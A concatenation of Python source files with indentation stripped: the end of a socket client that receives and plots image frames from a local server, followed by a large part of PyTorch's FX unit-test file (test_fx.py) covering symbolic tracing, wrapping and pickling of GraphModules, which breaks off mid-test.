msg = self.displayQ.get()
if msg is None:
break
print("**************** Display Thread")
msgid, srcid, totalbytes= headerStruct.unpack(msg[0:struct.calcsize(headerStruct.format)])
meta = (msgid, srcid, totalbytes)
offset = struct.calcsize(headerStruct.format)
print('offset=%d'%(offset))
ndim_struct = struct.Struct('H')
ndimsize = struct.calcsize(ndim_struct.format)
ndim = ndim_struct.unpack(msg[offset:offset + ndimsize])[0]
dimStruct = struct.Struct('H'*int(ndim))
dimsize = struct.calcsize(dimStruct.format)
dimensions = dimStruct.unpack(msg[offset + ndimsize:offset + ndimsize + dimsize])
offset = offset + ndimsize + dimsize
if srcid == interface.SRCID_IMAGE_FOURIER:
dtype = np.complex64
w, h = dimensions
elif srcid == interface.SRCID_IMAGE_RAW:
dtype = np.uint8
w, h = dimensions
#elif srcid == interface.SRCID_IMAGE_AMPLITUDE or srcid == interface.SRCID_IMAGE_PHASE or srcid == interface.SRCID_IMAGE_AMPLITUDE_AND_PHASE:
else:
dtype = np.float32
w, h, z, l = dimensions
outdata = np.fromstring(msg[offset:offset+(functools.reduce(lambda x,y: x*y, dimensions)*np.dtype(dtype).itemsize)], dtype=dtype).reshape(dimensions)
#print("&&&&& Max=%f, Min=%f, QueueSize=%d"%(np.max(outdata[:,:]), np.min(outdata[:,:]), self.displayQ.qsize()))
if PLOT:
if srcid == interface.SRCID_IMAGE_RAW:
#axes[i].imshow(mydata[:,:], extent=[0,w,0,h], aspect="auto", cmap='gray')
axes.clear()
axes.imshow(outdata[:,:], extent=[0,h,0,w], aspect="auto")
axes.set_title('Max=%.3f'%(np.max(outdata[:,:])))
elif srcid == interface.SRCID_IMAGE_FOURIER:
axes.clear()
axes.imshow(outdata[:,:], extent=[0,h,0,w], aspect="auto")
axes.set_title('Max=%.3f'%(np.max(outdata[:,:])))
else:
axes.clear()
axes.imshow(outdata[:,:,0,0], extent=[0,h,0,w], aspect="auto")
axes.set_title('Max=%.3f'%(np.max(outdata[:,:,0,0])))
plt.suptitle(repr(time.time()))
plt.draw()
#plt.show(block=False)
plt.pause(0.001)
print('End of DisplayThread')
def connect_to_server(self, server, port):
#headerStruct = struct.Struct('HHBIIIHH')
totlen = 0
count = 0
### Continous receive of data
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((server, port))
self.readfds = [self.sock]
### Start Display Thread
self.displaythread.start()
length = None
buf = b''
data = b''
msg=b''
lasttime = time.time()
meta = None
totalbytes = 0
while True:
#infds, outfds, errfds = select.select(self.readfds, [], [], 5)
infds, outfds, errfds = select.select(self.readfds, [], [], 5)
if not (infds or outfds or errfds):
continue
if self.exit: break
for s in infds:
if s is self.sock:
### Get as much data as we can
packet = self.sock.recv(150995023)
if not packet:
self.exit = True
self.displayQ.put_nowait(None)
break
data += packet
datalen = len(data)
print('len packet= %d'%(len(packet)))
### If he haven't processed the header/meta, then lets.
#if meta is None and datalen > struct.calcsize(headerStruct.format)+25:
if meta is None and datalen > struct.calcsize(headerStruct.format):
#packet = self.sock.recv(12)
#print("Recieve: %s"%(':'.join("{:02x}".format(ord(c)) for c in packet[0:50])))
msg_id, srcid, totalbytes = headerStruct.unpack(data[0:struct.calcsize(headerStruct.format)])
totalbytes += struct.calcsize(headerStruct.format)
meta = (msg_id, srcid)
print('msg_id=%d, srcid=%d, totalbytes=%d'%(msg_id, srcid, totalbytes))
if datalen >= totalbytes: ### We have a complete packet stored.
msg = data[:totalbytes]
data = data[totalbytes:]
meta = None
totalbytes = 0
#print('Counter=%d, Queue.Size=%d'%(count, self.displayQ.qsize()))
print('%.2f Hz'%(1/(time.time()-lasttime)))
lasttime = time.time()
#plt.show(block=False)
count+=1
#if self.displayQ.qsize() == 0:
self.displayQ.put_nowait(msg)
print('Full message received after getting meta: datalen=%d, datalen after=%d'%(datalen, len(data)))
else:
if datalen < totalbytes:
continue
### We have a complete message
msg = data[:totalbytes]
data = data[totalbytes:]
print('Full message received: datalen=%d, datalen after=%d'%(datalen, len(data)))
meta = None
totalbytes = 0
#if self.displayQ.qsize() == 0:
self.displayQ.put_nowait(msg)
#print('Counter=%d, Queue.Size=%d'%(count, self.displayQ.qsize()))
print('%.2f Hz'%(1/(time.time()-lasttime)))
lasttime = time.time()
count+=1
if self.exit: break
self.sock.close()
if __name__ == "__main__":
a = guiclient()
host= 'localhost' #socket.gethostname()
port = 9995
print("Client host: %s: port: %d"%(host, port))
a.connect_to_server(host, port)
|
test_fx.py
|
import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import warnings
import unittest
from math import sqrt
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
import torch.utils._pytree as pytree
import torch.fx._pytree as fx_pytree
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH
import torch._C._fx
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from collections import namedtuple
from torch.fx.proxy import TraceError
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import AnnotationsTest # noqa: F401
if sys.version_info >= (3, 7):
from fx.test_gradual_type import TypeCheckerTest # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union
from torch.testing._internal.common_utils import (
IS_FBCODE,
IS_MACOS,
IS_WINDOWS,
TEST_WITH_ROCM,
find_library_location,
run_tests,
)
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision import models as torchvision_models
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Used for test_autowrap_function. Autowrapped functions need to be global
def fx_int(x: float) -> int:
return int(x)
def fx_int_x2(x: float) -> int:
return int(x) * 2
# used in test_pytree. It's all the way out here because pickling a GraphModule
# that uses Point errors out if Point is local to the function
Point = namedtuple('Point', ['x', 'y'])
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
@wrap
def wrapped_via_decorator(a):
return a + 1
wrap('wrapped_with_submodule')
def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d):
return batchnorm1d(x)
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
# for testing pytrees
class Foo(object): # noqa: B209
def __init__(self, a, b):
self.a = a
self.b = b
class TestFX(JitTestCase):
def setUp(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
return
lib_file_path = find_library_location('libtorchbind_test.so')
torch.ops.load_library(str(lib_file_path))
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(m).transform()
self.assertIn('wrapped_via_decorator', transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
m = symbolic_trace(M())
self.assertIn("wrapped_with_submodule", m.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), m(input))
def test_wrapped_retrace(self):
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
retraced = symbolic_trace(m)
self.assertIn('wrapped_via_decorator', retraced.code)
self.assertEqual(retraced(0), 1)
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
for node in graph.nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
# 3) Returns the speficied return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_allclose(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_allclose(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_allclose(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
